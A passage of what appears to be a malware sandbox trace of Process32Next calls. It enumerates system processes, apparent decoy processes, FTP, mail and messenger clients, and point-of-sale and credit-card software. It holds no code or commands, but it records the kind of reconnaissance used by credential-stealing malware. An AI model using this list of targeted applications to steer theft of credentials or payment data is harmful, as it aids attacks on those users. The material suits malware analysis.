cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.239] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.241] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.244] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.284] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.286] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.287] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.289] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.290] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.292] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.294] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.295] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.297] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.300] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.301] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.304] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0221.306] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0221.308] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.309] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.311] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.312] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.314] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.316] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.317] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.319] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.360] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0221.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0221.363] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0221.364] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0221.366] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0221.368] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0221.370] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0221.371] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0221.373] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0221.375] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0221.376] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0221.378] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0221.380] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0221.381] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0221.383] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0221.384] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0221.386] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0221.387] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0221.389] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0221.391] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0221.392] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0221.431] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0221.449] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0221.451] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0221.453] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0221.455] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0221.458] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0221.460] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0221.462] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0221.464] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0221.467] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0221.469] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0221.471] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0221.473] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0221.475] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0221.477] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0221.480] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0221.521] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0221.523] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0221.525] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0221.528] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0221.529] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0221.531] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0221.533] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0221.535] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0221.537] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0221.539] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0221.541] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0221.543] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0221.544] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0221.546] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0221.548] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0221.550] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0221.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0221.555] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0221.612] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 